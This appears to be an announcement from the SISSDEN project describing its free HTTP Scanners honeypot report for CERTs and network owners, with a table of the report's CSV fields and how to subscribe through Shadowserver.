The primary objective of the SISSDEN project is to offer National CERTs, ISPs and network owners free reports on malicious activity detected on their networks. This is achieved through the establishment of a network of honeypots. One of these honeypots is dedicated toward observing HTTP scanning activity. HTTP scanning may be part of a benign activity - for example, a search engine indexing the web, a research project or an organization like the Shadowserver Foundation looking for open/vulnerable services that it can report to National CERTs and network owners so that they remediate their networks. Other scans may be part of a network reconnaisance that may be a preparatory phase for an attack. In other cases, the scan itself involves performing an attack, such as an SQL injection, Remote File Inclusion or Local File Inclusion attack or a specific exploit for a vulnerability. Quite often scanning activity is also part of a botnet that is actively looking to infect new sites or devices.
Below is a description of a report based on data collected by SISSDEN HTTP-aware honeypots. Aside from registering the source of the scan, it logs the request of the scan in raw form and attempts to match a pattern to the scan or attack. In cases where any malicious artifact was collected by the honeypot, its MD5 and SHA256 hash is also recorded. This information may be used to support an investigation by a CSIRT into an incident and determine its true nature.
Field | Description |
timestamp | Time that the scan was performed in UTC+0 |
ip | The IP address performing the scan |
port | The source port used in the scan |
asn | ASN announcing the scanning IP |
geo | Country where the scanning IP resides |
region | State / Province / Administrative region where the scanning IP resides |
city | ASN of where the scanning IP resides |
hostname | PTR record of the scanning IP |
type | Type of activity observed ie. http-scan |
dst_ip | The IP address of the target device |
dst_port | Destination port used in the scan |
dst_asn | ASN announcing the target IP |
dst_geo | Country where the target IP resides |
dst_dns | FQDN of the target, if applicable and recorded |
naics | North American Industry Classification System Code of the scanning IP |
sic | Standard Industrial Classification System Code of the scanning IP |
sector | Sector the attacking IP belongs to |
dst_sector | Sector the target IP belongs to |
public_source | Source of the data, for cases where the source accepts being credited |
sensorid | ID of sensor target device |
pattern | Request pattern if recognized by target sensor (eg, does it match an RFI, LFI, SQLi …) |
url | URL being requested by the scanning IP |
file_md5 | MD5 hash of file downloaded, if any |
file_sha256 | SHA256 hash of file downloaded, if any |
request_raw | Raw request sent by the scanning IP |
As of 13th September 2018, the HTTP Scanners report has been included in Shadowserver's reports and is being sent to 92+ National CSIRTs and 4200+ network owners as part of the free daily victim remediation feeds, in easily parsable CSV format. Anonymized samples of the reports being sent out are available here. If you are a network owner or CSIRT and wish to receive reports from SISSDEN you can either subscribe directly to Shadowserver's feeds or do so through the SISSDEN Customer Portal, which will be made available soon. Existing Shadowserver subscribers will get the free HTTP Scanners daily report automatically.
This is the second SISSDEN report that is being sent out to the community after the Brute Force report which has been going out on a daily basis since April 2018.